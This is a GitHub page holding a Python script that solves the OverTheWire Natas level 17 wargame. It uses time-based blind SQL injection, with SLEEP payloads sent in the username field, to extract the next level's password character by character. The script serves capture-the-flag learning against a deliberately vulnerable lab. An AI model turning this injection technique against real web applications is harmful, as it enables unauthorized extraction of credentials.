-
Notifications
You must be signed in to change notification settings - Fork 2
/
natas17.py
48 lines (40 loc) · 1.58 KB
/
natas17.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
"""
Help script to resolve natas challenge #17
"""
import requests
import json
level = 'natas17'
url = 'http://{}.natas.labs.overthewire.org/index.php'.format(level)
charset = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890'
seen = ''
password = ''
with open('natas.json') as j:
credentials = json.load(j)
auth = (level, credentials[level])
del credentials
"""
In this level we perform again blind SQLI but there is no output we could rely on.
We may try to sleep a certain amount of time to distinguish between requests.
"""
""" Find used chars. """
for symbol in charset:
# Request
response = requests.post(url,
data={'username': 'natas18" AND password LIKE BINARY \'%{}%\' and SLEEP(2) #'.format(symbol)},
auth=auth)
if response.elapsed.seconds >= 2:
seen += symbol
print(seen)
print('{}: {}'.format(len(seen), seen))
# # We know the pass is 32 character long. The LEFT() operator takes the amount of characters, therefore start with 1.
for iteration in range(0, 32):
# Guess if the password string starts with the seen string.
for symbol in seen:
# Request
response = requests.post(url,
data={'username': 'natas18" AND LEFT(password,{}) LIKE BINARY \'%{}%\' and SLEEP(2) #'.format(iteration + 1, password + symbol)},
auth=auth)
if response.elapsed.seconds >= 2:
password += symbol
print(password)
print("The password should be: {} len: {}".format(password, len(password)))